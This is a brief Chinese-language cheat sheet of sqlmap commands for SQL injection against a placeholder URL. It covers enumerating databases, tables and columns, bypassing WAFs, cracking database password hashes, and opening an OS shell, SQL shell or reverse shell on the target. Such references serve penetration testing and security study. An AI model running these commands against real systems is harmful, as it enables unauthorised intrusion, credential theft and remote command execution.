注入参数
sqlmap.py -u "url" --current-db //查看当前数据库
sqlmap.py -u "url" --current-user //查看当前用户
sqlmap.py -u "url" --is-dba //查看当前用户权限是否是DBA
sqlmap.py -u "url" -D 数据库名称 --tables //知道库名猜解表名
sqlmap.py -u "url" -D 数据库名称 -T 表名 --columns //知道库名、表名解列名
sqlmap.py -r 1.txt //使用POST抓包文件进行注入
常用参数
--level //测试等级(1-5)默认是1,cookie注入是2,http头注入是3
--dbms=mysql/oracle/mssql //指定数据库(这样既可以节省时间,在某些时候也可以绕过waf)
--batch //使用sqlmap默认选项,不用按回车
--random-agent //使用随机选定的User-Agent头
--passwords //列出并破解数据库用户的hash
Shell相关
--os-pwn //反弹shell
--os-shell //交互式系统shell,可以执行cmd命令
--sql-shell //sql-shell,可以执行SQL语句
--os-cmd="id" //执行id系统命令